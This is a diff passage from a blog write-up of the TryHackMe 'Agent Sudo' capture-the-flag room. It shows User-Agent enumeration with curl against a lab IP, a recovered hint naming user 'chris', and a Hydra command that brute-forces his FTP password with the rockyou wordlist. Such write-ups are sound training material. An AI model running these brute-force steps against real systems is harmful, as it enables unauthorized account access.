CptHilda0079/CptHilda0079.github.io/_posts/2024-01-07-TryHackMe-Agent_Sudo.md

     curl -L -A $letter 10.10.83.69; echo "Letter: $letter" done
 ```
-Running and evaluating the results from the script, we can see that the user-agent of Agent C gives a different repsonce to the others.
+Running and evaluating the results from the script, we can see that the user-agent of Agent C gives a different response to the others.
 ```
 Attention chris, <br><br>
 Do you still remember our deal?
 Please tell agent J about the stuff ASAP.
 Also, change your god damn password, is weak! <br><br>
 From,<br>
 Agent R
 ```
+#FTP Password Cracking
 We now know that there is a user named: Chris and that his password is weak.
 We can try to brute-force the ftp login with the username "chris".
 To do this I will be using Hydra Password Cracker
 ```
 └─$ hydra -l chris -P WordLists/rockyou.txt 10.10.83.69 ftp